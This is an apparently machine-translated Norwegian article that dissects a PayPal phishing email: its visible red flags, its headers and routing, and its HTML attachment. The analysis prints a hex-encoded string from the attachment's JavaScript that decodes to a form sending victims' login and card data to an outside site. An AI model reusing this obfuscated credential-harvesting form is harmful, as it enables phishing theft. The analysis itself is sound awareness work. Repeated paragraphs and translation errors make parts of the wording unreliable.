Online sikkerhet: bryte ned anatomien til en phishing-e-post

Innholdsfortegnelse:

Online sikkerhet: bryte ned anatomien til en phishing-e-post
Online sikkerhet: bryte ned anatomien til en phishing-e-post

Video: Online sikkerhet: bryte ned anatomien til en phishing-e-post

Video: Online sikkerhet: bryte ned anatomien til en phishing-e-post
Video: Windows Event and Logging for the IT Pro - YouTube 2024, November
Anonim
I dagens verden hvor all informasjon er online, er phishing et av de mest populære og ødeleggende nettangrepene, fordi du alltid kan rydde et virus, men hvis bankinformasjonen din blir stjålet, har du problemer. Her er en sammenfatning av et slikt angrep vi mottok.
I dagens verden hvor all informasjon er online, er phishing et av de mest populære og ødeleggende nettangrepene, fordi du alltid kan rydde et virus, men hvis bankinformasjonen din blir stjålet, har du problemer. Her er en sammenfatning av et slikt angrep vi mottok.

Tror ikke at det bare er dine bankdetaljer som er viktige: Hvis noen får kontroll over kontoinnlogging, vet de ikke bare informasjonen i den kontoen, men oddsen er at samme innloggingsinformasjon kan brukes på forskjellige andre kontoer. Og hvis de kompromitterer e-postkontoen din, kan de tilbakestille alle de andre passordene dine.

Så i tillegg til å holde sterke og varierende passord, må du alltid være på utkikk etter falske e-postmeldinger som er deilig. Mens de fleste phishing-forsøk er amatørmessige, er noen ganske overbevisende, så det er viktig å forstå hvordan de kan gjenkjenne dem på overflatenivå, og hvordan de fungerer under hetten.

Bilde av asirap

Undersøkelse Hva er i vanlig sikt

Vårt eksempel på e-post, som de fleste phishing-forsøk, "varsler" deg om aktivitet på PayPal-kontoen din, som under normale omstendigheter ville være alarmerende. Så kallet til handling er å bekrefte / gjenopprette kontoen din ved å sende inn omtrent alle opplysninger du kan tenke på. Igjen, dette er ganske formelisk.

Mens det absolutt er unntak, er nesten alle phishing- og svindel-e-postene lastet med røde flagg direkte i meldingen selv. Selv om teksten er overbevisende, kan du vanligvis finne mange feil som er fylt gjennom meldingsorganet som indikerer at meldingen ikke er legitim.

Meldingstorget

Ved første øyekast er dette en av de bedre phishing-e-postene jeg har sett. Det er ingen stavemåte eller grammatiske feil, og verbiage leser etter hva du kan forvente. Det er imidlertid noen få røde flagg du kan se når du undersøker innholdet litt nærmere.
Ved første øyekast er dette en av de bedre phishing-e-postene jeg har sett. Det er ingen stavemåte eller grammatiske feil, og verbiage leser etter hva du kan forvente. Det er imidlertid noen få røde flagg du kan se når du undersøker innholdet litt nærmere.
  • "Paypal" - Det riktige tilfellet er "PayPal" (kapital P). Du kan se begge variantene blir brukt i meldingen. Bedrifter er svært bevisst med sin merkevarebygging, så det er tvilsomt noe som dette ville passere korrekturprosessen.
  • "Tillat ActiveX" - Hvor mange ganger har du sett en legitim nettbasert bedrift, størrelsen på Paypal bruker en proprietær komponent som bare fungerer på en nettleser, spesielt når de støtter flere nettlesere? Visst, et sted der ute, gjør noen selskaper det, men dette er et rødt flagg.
  • "Sikkert." - Legg merke til hvordan dette ordet ikke rager opp i marginen med resten av avsnittet. Selv om jeg strekker vinduet litt mer, vil det ikke vikle eller plassere riktig.
  • "Paypal!" - Rommet før utropstegnet ser utilsiktet ut. Bare en annen quirk som jeg er sikker på, ikke ville være i en legitim e-post.
  • "PayPal-kontooppdateringsformular.pdf.htm" - Hvorfor skulle Paypal legge ved en "PDF", spesielt når de bare kunne lenke til en side på deres nettsted? I tillegg, hvorfor ville de forsøke å skjule en HTML-fil som PDF? Dette er det største røde flagget av dem alle.

Meldingsoverskriften

Når du ser på meldingsoverskriften, vises et par flere røde flagg:
Når du ser på meldingsoverskriften, vises et par flere røde flagg:
  • Fra adressen er [email protected].
  • Adressen mangler. Jeg har ikke tømt dette ut, det er bare ikke en del av standard meldingsoverskrift. Vanligvis vil et firma som har navnet ditt, personliggjøre e-posten til deg.

Vedlegget

Når jeg åpner vedlegget, kan du umiddelbart se at oppsettet ikke er riktig fordi det mangler stilinformasjon. Igjen, hvorfor ville PayPal sende et HTML-skjema når de bare kunne gi deg en link på nettstedet deres?

Merk: Vi brukte Gmail's innebygde HTML-vedleggsvisning for dette, men vi anbefaler at du IKKE åpner vedlegg fra svindlere. Aldri. Noensinne. De inneholder svært ofte utnyttelser som vil installere trojanere på PCen din for å stjele kontoinformasjonen din.

Ruller ned litt mer, du kan se at dette skjemaet ikke bare krever innloggingsinformasjon for PayPal, men også for bankkort og kredittkortinformasjon. Noen av bildene er ødelagte.
Ruller ned litt mer, du kan se at dette skjemaet ikke bare krever innloggingsinformasjon for PayPal, men også for bankkort og kredittkortinformasjon. Noen av bildene er ødelagte.
Det er åpenbart at dette phishing-forsøket går etter alt med ett slag.
Det er åpenbart at dette phishing-forsøket går etter alt med ett slag.

Den tekniske sammenbrudd

Selv om det skal være ganske klart basert på hva som er klart i det hele tatt at dette er et phishing-forsøk, skal vi nå bryte ned den tekniske sminke av e-posten og se hva vi kan finne.

Informasjon fra vedlegget

Den første tingen å se på er HTML-kilden til vedleggsskjemaet som er det som sender dataene til det falske nettstedet.

Når du raskt ser på kilden, vises alle koblingene gyldige som de peker til enten "paypal.com" eller "paypalobjects.com" som begge er legitime.

Image
Image

Nå skal vi se på noen grunnleggende sideinformasjon som Firefox samler på siden.

Som du kan se, blir noen av grafikkene trukket fra domenene "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for legit PayPal-domener.
Som du kan se, blir noen av grafikkene trukket fra domenene "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for legit PayPal-domener.
Image
Image

Informasjon fra e-posthodene

Neste vil vi se på de raske e-postmeldingshodene. Gmail gjør dette tilgjengelig via alternativet Vis original meny på meldingen.

Ser du på topptekstinformasjonen for den opprinnelige meldingen, kan du se denne meldingen ble komponert ved hjelp av Outlook Express 6. Jeg tviler på at PayPal har noen på personalet som sender hver av disse meldingene manuelt via en utdatert e-postklient.
Ser du på topptekstinformasjonen for den opprinnelige meldingen, kan du se denne meldingen ble komponert ved hjelp av Outlook Express 6. Jeg tviler på at PayPal har noen på personalet som sender hver av disse meldingene manuelt via en utdatert e-postklient.
Når vi ser på rutingsinformasjonen, kan vi se IP-adressen til både avsenderen og relaying-mailserveren.
Når vi ser på rutingsinformasjonen, kan vi se IP-adressen til både avsenderen og relaying-mailserveren.
IP-adressen til brukeren er original avsender. Å gjøre en rask oppslag på IP-informasjonen, vi kan se sendeprofilen er i Tyskland.
IP-adressen til brukeren er original avsender. Å gjøre en rask oppslag på IP-informasjonen, vi kan se sendeprofilen er i Tyskland.
Og når vi ser på relaying-postserveren (mail.itak.at), kan IP-adressen vi ser dette være en ISP basert i Østerrike. Jeg tviler på at PayPal ruter e-postene direkte gjennom en Østerrike-basert Internett-leverandør når de har en massiv serverfarm som lett kan håndtere denne oppgaven.
Og når vi ser på relaying-postserveren (mail.itak.at), kan IP-adressen vi ser dette være en ISP basert i Østerrike. Jeg tviler på at PayPal ruter e-postene direkte gjennom en Østerrike-basert Internett-leverandør når de har en massiv serverfarm som lett kan håndtere denne oppgaven.
Image
Image

Hvor går dataene?

Så vi har klart bestemt at dette er en phishing-e-post og samlet litt informasjon om hvor meldingen stammer fra, men hva med hvor dataene dine sendes?

For å se dette må vi først lagre HTM vedlegget gjør skrivebordet vårt og åpne i et tekstredigeringsprogram. Ruller gjennom det, alt ser ut til å være i orden, bortsett fra når vi kommer til en mistenkelig jakt-Javascript-blokk.

Image
Image

Å bryte ut den fulle kilden til den siste blokken Javascript, vi ser:

Når som helst du ser en stor jumbled streng av tilsynelatende tilfeldige bokstaver og tall innebygd i en Javascript-blokk, er det vanligvis noe mistenkelig. Ser man på koden, er variabelen "x" satt til denne store strengen og dekoderes deretter til variabelen "y". Det endelige resultatet av variabel "y" skrives deretter til dokumentet som HTML.

Siden den store strengen er laget av tallene 0-9 og bokstavene a-f, er det mest sannsynlig kodet via en enkel ASCII til Hex-konvertering:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Oversetter til:

Det er ikke en tilfeldighet at dette dekoder til et gyldig HTML-skjema-tag som sender resultatene ikke til PayPal, men til et skurksted.

I tillegg, når du ser HTML-kilden til skjemaet, vil du se at denne skjemaetiketten ikke er synlig fordi den genereres dynamisk via Javascript. Dette er en smart måte å skjule hva HTML-en egentlig gjør hvis noen bare skulle se den genererte kilden til vedlegget (som vi gjorde tidligere) i motsetning til å åpne vedlegget direkte i en tekstredigerer.

Kjører en rask whois på det fornærmende nettstedet, vi kan se dette er et domene hostet på en populær webverten, 1and1.
Kjører en rask whois på det fornærmende nettstedet, vi kan se dette er et domene hostet på en populær webverten, 1and1.
Det som skiller seg ut er at domenet bruker et lesbart navn (i motsetning til noe som "dfh3sjhskjhw.net") og domenet har blitt registrert i 4 år. På grunn av dette tror jeg at dette domenet ble kapret og brukt som en bonde i dette phishing-forsøket.
Det som skiller seg ut er at domenet bruker et lesbart navn (i motsetning til noe som "dfh3sjhskjhw.net") og domenet har blitt registrert i 4 år. På grunn av dette tror jeg at dette domenet ble kapret og brukt som en bonde i dette phishing-forsøket.

Cynicism er et godt forsvar

Når det gjelder å holde seg trygg på nettet, gjør det aldri vondt å ha en god grad av kynisme.

Selv om jeg er sikker på at det er flere røde flagg i eksemplet e-post, er det vi har pekt på ovenfor indikatorer vi så etter bare noen få minutters undersøkelse. Hypotetisk, hvis overflatenivået av e-posten etterlignet sin legitime motpart 100%, ville den tekniske analysen fortsatt avsløre sin sanne natur. Derfor importeres det for å kunne undersøke både hva du kan og ikke kan se.

Anbefalt:

Hva er "Spear Phishing", og hvordan tar det ned store selskaper?

Hva er "Spear Phishing", og hvordan tar det ned store selskaper?

Nyheten er full av rapporter om "spydsfiskeangrep" som brukes mot regjeringer, store selskaper og politiske aktivister. Spear-phishing-angrep er nå den vanligste måten bedriftens nettverk er i fare, ifølge mange rapporter.

Legg til evnen til å kopiere innholdet til enhver tekstfil til Send til menyen

Legg til evnen til å kopiere innholdet til enhver tekstfil til Send til menyen

Vi har tidligere dekket hvordan du kan legge til muligheten til å kopiere innholdet i en TXT-fil til høyreklikk-kontekstmenyen, men denne metoden krever at du oppretter en separat registeroppføring for hver type fil du ønsket muligheten til å gjøre dette med (f.eks. JS, BAT, LOG, HTM, CSS, etc.).

Slik bruker du gjenopprettingspartisjonen til å bryte inn i en Mac OS X Lion

Slik bruker du gjenopprettingspartisjonen til å bryte inn i en Mac OS X Lion

Det er trivielt å bryte inn i en Mac ved hjelp av en OS X-oppstartsdisk, men nye Macer bruker en gjenopprettingspartisjon for OS-installasjoner. Slik kan du bruke den partisjonen til å tilbakestille et brukerpassord og bryte inn i en Mac.

Last ned personlig sikkerhet i skyen, whitepaper fra Microsoft

Last ned personlig sikkerhet i skyen, whitepaper fra Microsoft

Microsoft har utarbeidet dette dokumentet for å undersøke problemene som er involvert, og gir en oversikt over selskapets online sikkerhetsinnsats i Cloud Computing.

Hva er phishing og hvordan du identifiserer phishing-angrep

Hva er phishing og hvordan du identifiserer phishing-angrep

Dette innlegget vil øke Phishing-bevisstheten din, da den forteller deg hvordan du unngår phishing-angrep, og vær trygg på nettet. Typer og egenskaper ved phishing-angrep diskuteres også.